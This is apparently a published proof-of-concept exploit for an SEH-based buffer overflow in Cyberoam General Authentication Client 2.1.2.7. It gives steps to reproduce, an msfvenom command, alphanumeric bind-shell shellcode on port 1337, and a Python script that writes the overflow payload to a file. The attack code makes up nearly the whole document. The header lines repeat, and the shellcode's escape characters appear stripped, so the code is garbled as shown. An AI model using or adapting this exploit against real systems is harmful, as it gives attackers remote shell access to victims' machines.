# Date: 2020-02-28
# Exploit Author: Andrey Stoykov
# Version: Cyberoam General Authentication Client 2.1 # Exploit Title: Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)
# Date: 2020-02-28
# Exploit Author: Andrey Stoykov
# Version: Cyberoam General Authentication Client 2.1.2.7
# Tested on: Windows Vista SP2 x86
Steps to Reproduce:
1) Run the POC
2) Copy the contents of "sploit.txt" into the "Cyberoam Server Address" and click "Check"
3) Bind TCP shell should spawn on port 1337
# Badchars to be avoided: "x0ax00x0dx01x02x03x04"
# msfvenom -p windows/shell_bind_tcp -f c -b "x0ax00x0dx01x02x03x04" lport=1337 -e x86/alpha_mixed
Exploit POC:
shellcode = ("x89xe6xddxc5xd9x76xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x49x6cx6ax48x4ex62x77x70x43x30x67x70x43x50x6f"
"x79x6dx35x66x51x6fx30x71x74x6ex6bx42x70x66x50"
"x6ex6bx30x52x34x4cx6ex6bx76x32x32x34x4ex6bx30"
"x72x64x68x46x6fx6dx67x43x7ax54x66x70x31x39x6f"
"x4ex4cx77x4cx71x71x33x4cx46x62x66x4cx37x50x4b"
"x71x38x4fx54x4dx46x61x49x57x49x72x79x62x72x72"
"x71x47x6cx4bx43x62x74x50x4ex6bx70x4ax55x6cx6c"
"x4bx50x4cx77x61x73x48x4ax43x43x78x35x51x6ax71"
"x43x61x6cx4bx30x59x77x50x35x51x4ex33x6ex6bx33"
"x79x67x68x69x73x64x7ax77x39x6cx4bx75x64x4ex6b"
"x75x51x4ax76x66x51x59x6fx4ex4cx5ax61x58x4fx66"
"x6dx47x71x4ax67x45x68x49x70x73x45x59x66x47x73"
"x71x6dx68x78x67x4bx61x6dx76x44x62x55x78x64x70"
"x58x4ex6bx72x78x34x64x53x31x4ex33x52x46x6cx4b"
"x66x6cx52x6bx4cx4bx76x38x67x6cx73x31x5ax73x4c"
"x4bx34x44x6ex6bx57x71x6ax70x4ex69x33x74x36x44"
"x56x44x33x6bx71x4bx70x61x31x49x50x5ax46x31x69"
"x6fx79x70x53x6fx63x6fx30x5ax6ex6bx64x52x5ax4b"
"x4cx4dx61x4dx35x38x55x63x75x62x37x70x77x70x53"
"x58x62x57x71x63x76x52x43x6fx71x44x55x38x30x4c"
"x72x57x31x36x64x47x39x6fx69x45x4ex58x5ax30x75"
"x51x33x30x47x70x46x49x4bx74x42x74x32x70x30x68"
"x36x49x6dx50x50x6bx57x70x4bx4fx69x45x31x7ax53"
"x38x70x59x72x70x4ax42x39x6dx73x70x70x50x43x70"
"x66x30x42x48x6bx5ax36x6fx49x4fx4bx50x49x6fx79"
"x45x4cx57x42x48x75x52x45x50x35x55x35x69x4ex69"
"x4ax46x51x7ax52x30x62x76x36x37x50x68x4bx72x59"
"x4bx55x67x55x37x79x6fx4ax75x70x57x71x78x68x37"
"x79x79x67x48x79x6fx6bx4fx4ex35x33x67x43x58x63"
"x44x6ax4cx75x6bx4bx51x39x6fx49x45x32x77x6dx47"
"x52x48x70x75x70x6ex30x4dx53x51x79x6fx6bx65x31"
"x78x63x53x50x6dx42x44x67x70x6fx79x49x73x73x67"
"x72x77x62x77x64x71x4ax56x32x4ax54x52x46x39x33"
"x66x4ax42x79x6dx32x46x7ax67x50x44x71x34x75x6c"
"x67x71x56x61x6ex6dx33x74x51x34x52x30x38x46x53"
"x30x67x34x43x64x30x50x46x36x32x76x42x76x77x36"
"x53x66x72x6ex42x76x50x56x43x63x36x36x71x78x53"
"x49x68x4cx77x4fx6cx46x79x6fx49x45x6dx59x4dx30"
"x50x4ex70x56x63x76x79x6fx46x50x71x78x66x68x6d"
"x57x75x4dx55x30x69x6fx79x45x4fx4bx58x70x58x35"
"x4fx52x71x46x52x48x6cx66x6dx45x4dx6dx6fx6dx6b"
"x4fx69x45x75x6cx74x46x63x4cx47x7ax6bx30x59x6b"
"x39x70x31x65x77x75x6fx4bx72x67x62x33x50x72x30"
"x6fx42x4ax77x70x72x73x79x6fx59x45x41x41")
buffer = "A"*216 + "xebx10x90x90"+ "x97x44x9cx0f" + "x90"*500 + shellcode
buffer += "B"*(16688-216-8-500)
f = open('sploit.txt', 'w')
f.write(buffer)
f.close()